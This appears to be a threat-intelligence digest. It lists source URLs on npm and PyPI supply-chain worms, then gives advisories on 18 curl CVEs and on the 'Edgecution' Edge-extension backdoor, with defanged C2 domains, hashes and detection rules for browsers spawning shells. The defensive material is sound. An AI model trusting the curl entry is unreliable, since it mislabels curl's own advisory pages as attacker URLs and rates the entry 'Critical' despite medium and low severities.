https://it.slashdot.org/story/26/06/01/1624228/red-hat-npm-packages-compromised-to-spread-a-credential-stealing-worm?utm_source=rss1.0mainlinkanon&utm_medium=feed

https://it.slashdot.org/story/26/06/09/1657218/microsoft-hacked-to-deliver-malware-to-claude-and-gemini-users?utm_source=rss1.0mainlinkanon&utm_medium=feed

https://linuxiac.com/red-hat-npm-packages-compromised-in-supply-chain-attack/

https://orca.security/resources/blog/hades-pypi-supply-chain-attack/

https://orca.security/resources/blog/red-hat-npm-supply-chain-attack/

https://safedep.io/config-files-that-run-code

https://sauleau.com/notes/airgap-security-for-the-modern-ai-age.html

https://securereading.com/major-supply-chain-attack-malicious-red-hat-npm-packages-used-to-steal-developer-credentials-and-spread-self-replicating-malware/

https://securityboulevard.com/2026/06/miasma-returns-leo-platform-compromise-in-npm/

https://securityboulevard.com/2026/06/new-shai-hulud-miasma-wave-hits-hundreds-of-npm-packages/

https://securityboulevard.com/2026/06/shai-hulud-campaign-evolution-miasma-hades-and-ai-scanner-evasion/

https://securitybrief.asia/story/mini-shai-hulud-worm-turns-public-ncc-group-warns

https://securityonline.info/malicious-pypi-package-wave-threat/

https://securityonline.info/pypi-supply-chain-attack/

https://securityonline.info/red-hat-npm-attack/

https://socradar.io/blog/shai-hulud-hades-pypi-campaign/

https://thehackernews.com/2026/06/hades-pypi-attack-19-packages-poisoned.html

https://thehackernews.com/2026/06/miasma-supply-chain-attack-compromises.html

https://thehackernews.com/2026/06/miasma-worm-hits-73-microsoft-github.html

https://thehackernews.com/2026/06/microsoft-restores-some-github-repos.html

https://thehackernews.com/2026/06/vs-code-adds-2-hour-extension-auto.html

https://www.bleepingcomputer.com/news/security/github-disables-microsoft-repos-pushing-password-stealing-malware/

https://www.bleepingcomputer.com/news/security/new-ironworm-malware-hits-36-packages-in-npm-supply-chain-attack/

https://www.bleepingcomputer.com/news/security/new-shai-hulud-attack-trojanizes-19-science-focused-pypi-packages/

https://www.bleepingcomputer.com/news/security/red-hat-npm-packages-compromised-to-steal-developer-credentials/

https://www.bleepingcomputer.com/news/security/the-miasma-worm-source-code-briefly-leaked-on-github/

https://www.ctfiot.com/309541.html

https://www.ctfiot.com/309636.html

https://www.cyberkendra.com/2026/06/red-hat-cloud-services-npm-packages.html

https://www.darkreading.com/application-security/hades-campaign-pypi-shai-hulud

https://www.darkreading.com/application-security/miasma-supply-chain-worm-73-microsoft-repositories

https://www.helpnetsecurity.com/2026/06/11/owasp-prompt-injection-ai-security-failures/

https://www.hendryadrian.com/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-and-github-actions-expands-to-the-go-ecosystem/

https://www.hendryadrian.com/mini-shai-hulud-campaign-hits-red-hat-cloud-services-npm-packages/

https://www.hendryadrian.com/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious-pypi-wheels/

https://www.hendryadrian.com/shai-hulud-descends-to-hades-miasma-worm-campaign-spreads-with-new-pypi-wave/

https://www.hendryadrian.com/the-case-for-github-actions-security-after-recent-supply-chain-attacks-datadog-security-labs/

https://www.infosecurity-magazine.com/news/red-hat-npm-scope-backdoored/

https://www.microsoft.com/en-us/security/blog/2026/06/02/preinstall-persistence-inside-red-hat-npm-miasma-credential-stealing-campaign/

https://www.morphisec.com/blog/its-in-your-ai-assistant-now-shai-hulud-wave-3-and-the-miasma-worm-targeting-npm/

https://www.reversinglabs.com/blog/31-red-hat-cloud-service-npm-packages-backdoored-in-72-seconds

https://www.reversinglabs.com/blog/noise-to-signal-malware-matters

https://www.scworld.com/news/mini-shai-hulud-hades-variant-affects-23-pypi-package-versions

https://www.securitylab.ru/news/573266.php

https://www.securitylab.ru/news/573496.php

https://www.securityweek.com/over-100-npm-pypi-packages-hit-in-new-shai-hulud-supply-chain-attacks/

https://www.securityweek.com/supply-chain-attack-hits-32-red-hat-npm-packages/

https://www.techradar.com/pro/security/microsoft-disables-over-70-github-repos-after-hackers-compromised-them-with-dangerous-malware

https://www.techzine.eu/blogs/security/141954/ais-real-security-risk-is-the-supply-chain/

https://www.techzine.eu/news/security/141769/malicious-code-found-in-red-hats-npm-packages/

https://www.theregister.com/cyber-crime/2026/06/09/miasma-supply-chain-attack-toolkit-goes-public-on-github/5253074

https://www.theregister.com/security/2026/06/01/shai-hulud-malware-infects-red-hat-npm-packages-downloaded-80k-times-weekly/5249803

https://www.theregister.com/security/2026/06/08/github-nukes-70-microsoft-repos-amid-suspected-worm-attack/5252169

https://www.wiz.io/blog/miasma-supply-chain-attack-targeting-redhat-npm-packages

https://www.zdnet.com/article/red-hat-hit-by-npm-supply-chain-attack-how-to-stay-safe/

https://www.zscaler.com/blogs/security-research/shai-hulud-campaign-evolution-miasma-hades-and-ai-scanner-evasion

Curl Patches 18 Vulnerabilities, Including 25-Year-Old Authentication Bypass Flaw (CVE-2026-8932)

The open source data transfer tool and library curl has been updated with patches for 18 vulnerabilities, including four medium and 14 low-severity issues, marking the highest number of CVEs resolved in a single update. Among these is CVE-2026-8932, an mTLS connection reuse flaw introduced 25 years ago in version 7.7 (March 22, 2001), which can lead to authentication bypass in libcurl applications by allowing connection reuse despite changes in client certificate or private key settings. Other resolved vulnerabilities include credential confusion (CVE-2026-8926), double-free (CVE-2026-8925), use-after-free (CVE-2026-9080 and CVE-2026-10536), and improper host validation (CVE-2026-9547). These flaws were identified through a community effort, underscoring the challenge of discovering security issues in curl, a tool utilized by over 30 billion devices for data transfer, though no public reports of in-the-wild exploitation have been confirmed.

Severity: Critical

Threat Details and IOCs

CVEs:	CVE-2026-10536, CVE-2026-11352, CVE-2026-11564, CVE-2026-11586, CVE-2026-11856, CVE-2026-12064, CVE-2026-8286, CVE-2026-8458, CVE-2026-8924, CVE-2026-8925, CVE-2026-8926, CVE-2026-8927, CVE-2026-8932, CVE-2026-9079, CVE-2026-9080, CVE-2026-9545, CVE-2026-9546, CVE-2026-9547
Technologies:	cURL
Attacker Domains:	curl[.]se
Attacker URLs:	hxxps[://]curl[.]se/docs/CVE-2026-10536.html, hxxps[://]curl[.]se/docs/CVE-2026-11352.html, hxxps[://]curl[.]se/docs/CVE-2026-11564.html, hxxps[://]curl[.]se/docs/CVE-2026-11586.html, hxxps[://]curl[.]se/docs/CVE-2026-11856.html, hxxps[://]curl[.]se/docs/CVE-2026-12064.html, hxxps[://]curl[.]se/docs/CVE-2026-8286.html, hxxps[://]curl[.]se/docs/CVE-2026-8458.html, hxxps[://]curl[.]se/docs/CVE-2026-8924.html, hxxps[://]curl[.]se/docs/CVE-2026-8925.html, hxxps[://]curl[.]se/docs/CVE-2026-8926.html, hxxps[://]curl[.]se/docs/CVE-2026-8927.html, hxxps[://]curl[.]se/docs/CVE-2026-8932.html, hxxps[://]curl[.]se/docs/CVE-2026-9079.html, hxxps[://]curl[.]se/docs/CVE-2026-9080.html, hxxps[://]curl[.]se/docs/CVE-2026-9545.html, hxxps[://]curl[.]se/docs/CVE-2026-9546.html, hxxps[://]curl[.]se/docs/CVE-2026-9547.html
Victim Industries:	Aerospace, Automotive, Information Technology, Software, Technology Hardware, Telecommunications

Mitigation Advice

Use vulnerability scanners and software inventory tools to identify all assets running vulnerable versions of curl and libcurl.
Prioritize and apply the patch to update curl and libcurl to the latest secure version on all affected systems, focusing first on internet-facing and business-critical applications.

Compliance Best Practices

Implement a process to generate and maintain a Software Bill of Materials (SBOM) for all critical and in-house developed applications to improve visibility into underlying software components.
Implement or mature an automated patch management system for operating systems and common third-party applications to ensure timely deployment of security updates.
Review and enhance network segmentation controls to limit lateral movement between systems and services, reducing the potential impact of a compromised application.

Sources

https://aisle.com/blog/aisle-discovers-6-new-cves-in-curl-including-the-oldest-issue-ever-reported

https://securityonline.info/?p=795534

https://www.securityweek.com/25-year-old-vulnerability-patched-in-curl/

Malicious Edge Extension Abuses Native Messaging as Bridge to Malware

A malicious Microsoft Edge extension, dubbed 'Edgecution,' has been observed in ransomware attacks, specifically by an Initial Access Broker associated with the Payouts Kings operation. This extension exploits the Chrome Native Messaging protocol to bypass the browser sandbox and deploy a Python-based backdoor on compromised systems. The attack typically initiates through social engineering, where threat actors impersonate IT support on Microsoft Teams, directing victims to fraudulent "update" pages. These pages prompt the download of malicious scripts (via AutoHotKey, batch, or PowerShell) that configure the environment, extract malware components from a malformed ZIP archive, and establish persistence through scheduled tasks and native messaging manifests. The 'Edgecution' extension, disguised as an 'Edge Monitoring Agent,' operates in a headless browser, communicating with a command-and-control server and relaying instructions to the Python backdoor. This backdoor is capable of executing shell commands, PowerShell, arbitrary Python code, writing files, and gathering system information. To counter this evolving threat, organizations should strengthen monitoring of browser extensions and enforce stringent controls over native messaging host configurations. Indicators of Compromise, including C2 servers and malware hashes, have been identified.

Severity: Critical

Threat Details and IOCs

Malware:	Edgecution, Edge Monitoring Agent, Payout Kings, Payouts King, PayoutsKing
Technologies:	AutoHotkey, Google Chrome, Microsoft 365, Microsoft Outlook, Microsoft Teams, Microsoft Windows, Python
Threat Actors:	Payoutsking
Attacker Domains:	d1jp293q9tvi92[.]cloudfront[.]net, d23l50n6ubud7p[.]cloudfront[.]net, d2g6dl71gua1qa[.]cloudfront[.]net, d3nh8sl98s2554[.]cloudfront[.]net
Attacker URLs:	wss[:]//d1jp293q9tvi92.cloudfront.net/ws, wss[:]//d23l50n6ubud7p.cloudfront.net/ws, wss[:]//d2g6dl71gua1qa.cloudfront.net/ws, wss[:]//d3nh8sl98s2554.cloudfront.net/ws
Attacker Hashes:	3d1158884fb339b3328bd330fcc27598e1f1c94bcac39e75d1a272afa4deee1a, a08d8e63b0cd3638fb40b8e6da546e26da69439597565827f9cec87915f78568
Victim Industries:	Business Services, Civil Infrastructure, Education, Engineering, Financial Services, Food & Beverage, Government, Healthcare, Manufacturing, Retail, Transportation
Victim Countries:	Brazil, Canada, Germany, Ireland, Italy, Spain, United Kingdom, United States

Mitigation Advice

Add the file hashes and command-and-control server domains associated with the Edgecution malware to your EDR, proxy, and firewall blocklists.
Create and run a threat hunting query in your SIEM or EDR to search for new scheduled tasks that launch Microsoft Edge, particularly with the '--headless=new' command-line argument.
Scan network traffic logs and endpoint file systems for ZIP files with malformed headers, and investigate any associated download events from un-trusted websites.

Compliance Best Practices

Use Group Policy (GPO) or a Mobile Device Management (MDM) solution to prevent users from installing browser extensions; create and enforce an allowlist of approved extensions required for business functions.
Configure Microsoft Edge and Google Chrome browser policies to block all Native Messaging hosts by default, and establish a formal review process to approve and allowlist only legitimate applications.
Implement a recurring security awareness training program that specifically educates employees on how to identify and report social engineering attempts on collaboration platforms like Microsoft Teams, and how to verify the legitimacy of IT support requests through a separate, trusted channel.
Deploy an application control solution, such as Windows Defender Application Control (WDAC) or AppLocker, to restrict the execution of scripting engines like PowerShell, AutoHotKey, and Python to only authorized users or signed scripts.
Tune your EDR and SIEM detection rules to generate high-priority alerts when a browser process (e.g., msedge.exe) spawns command-line interpreters (cmd.exe, powershell.exe) or performs sensitive system discovery actions.